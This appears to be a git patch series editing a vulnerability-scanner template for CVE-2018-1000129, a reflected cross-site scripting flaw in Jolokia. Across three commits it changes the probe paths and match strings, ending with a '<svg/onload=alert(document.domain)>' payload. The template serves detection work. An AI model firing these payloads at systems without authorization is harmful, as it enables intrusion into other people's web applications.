From 211309301424169f38f7585f61f5380b4d98242f Mon Sep 17 00:00:00 2001
From: flag007 <66717990+flag007@users.noreply.github.com>
Date: Thu, 27 Aug 2020 20:27:47 +0800
Subject: [PATCH 1/3] Update CVE-2018-1000129.yaml

There are two problems with this payload, / means the path, add it cannot be detected correctly, in addition, it should not be url-encoded
---
 cves/CVE-2018-1000129.yaml | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/cves/CVE-2018-1000129.yaml b/cves/CVE-2018-1000129.yaml
index ebaf25b0e0..46ba8c2eec 100644
--- a/cves/CVE-2018-1000129.yaml
+++ b/cves/CVE-2018-1000129.yaml
@@ -8,9 +8,9 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/jolokia/read%3Csvg/onload=alert(1337)%3E?mimeType=text/html"
-      - "{{BaseURL}}/api/jolokia/read%3Csvg/onload=alert(1337)%3E?mimeType=text/html"
-      - "{{BaseURL}}:8080/jolokia/read%3Csvg/onload=alert(1337)%3E?mimeType=text/html"
+      - "{{BaseURL}}/jolokia/read<svg>?mimeType=text/html"
+      - "{{BaseURL}}/api/jolokia/read<svg>?mimeType=text/html"
+      - "{{BaseURL}}:8080/jolokia/read<svg>?mimeType=text/html"
     matchers-condition: and
     matchers:
       - type: status
@@ -18,5 +18,5 @@ requests:
           - 200
       - type: word
         words:
-          - "<svg/onload=alert(1337)>"
+          - "<svg>"
         part: body

From 10bc6dbef635ab759e739c630223c152cd3223b4 Mon Sep 17 00:00:00 2001
From: flag007 <66717990+flag007@users.noreply.github.com>
Date: Thu, 27 Aug 2020 20:32:15 +0800
Subject: [PATCH 2/3] Update CVE-2018-1000129.yaml

A single svg is prone to false positives, let me update the payload
---
 cves/CVE-2018-1000129.yaml | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/cves/CVE-2018-1000129.yaml b/cves/CVE-2018-1000129.yaml
index 46ba8c2eec..c1a75edf2a 100644
--- a/cves/CVE-2018-1000129.yaml
+++ b/cves/CVE-2018-1000129.yaml
@@ -8,9 +8,9 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/jolokia/read<svg>?mimeType=text/html"
-      - "{{BaseURL}}/api/jolokia/read<svg>?mimeType=text/html"
-      - "{{BaseURL}}:8080/jolokia/read<svg>?mimeType=text/html"
+      - "{{BaseURL}}/jolokia/read<svgxxxxxx>?mimeType=text/html"
+      - "{{BaseURL}}/api/jolokia/read<svgxxxxxx>?mimeType=text/html"
+      - "{{BaseURL}}:8080/jolokia/read<svgxxxxxx>?mimeType=text/html"
     matchers-condition: and
     matchers:
       - type: status
@@ -18,5 +18,5 @@ requests:
           - 200
       - type: word
         words:
-          - "<svg>"
+          - "<svgxxxxxx>"
         part: body

From 3ff2f585c5f9e7e873f043be0edb06d7014210c1 Mon Sep 17 00:00:00 2001
From: bauthard <8293321+bauthard@users.noreply.github.com>
Date: Sun, 30 Aug 2020 10:02:59 +0530
Subject: [PATCH 3/3] Update CVE-2018-1000129.yaml

---
 cves/CVE-2018-1000129.yaml | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/cves/CVE-2018-1000129.yaml b/cves/CVE-2018-1000129.yaml
index c1a75edf2a..c3c5808622 100644
--- a/cves/CVE-2018-1000129.yaml
+++ b/cves/CVE-2018-1000129.yaml
@@ -8,9 +8,9 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/jolokia/read<svgxxxxxx>?mimeType=text/html"
-      - "{{BaseURL}}/api/jolokia/read<svgxxxxxx>?mimeType=text/html"
-      - "{{BaseURL}}:8080/jolokia/read<svgxxxxxx>?mimeType=text/html"
+      - "{{BaseURL}}/jolokia/read<svg/onload=alert(document.domain)>?mimeType=text/html"
+      - "{{BaseURL}}/api/jolokia/read<svg/onload=alert(document.domain)>?mimeType=text/html"
+      - "{{BaseURL}}:8080/jolokia/read<svg/onload=alert(document.domain)>?mimeType=text/html"
     matchers-condition: and
     matchers:
       - type: status
@@ -18,5 +18,5 @@ requests:
           - 200
       - type: word
         words:
-          - "<svgxxxxxx>"
+          - "<svg/onload=alert(document.domain)>"
         part: body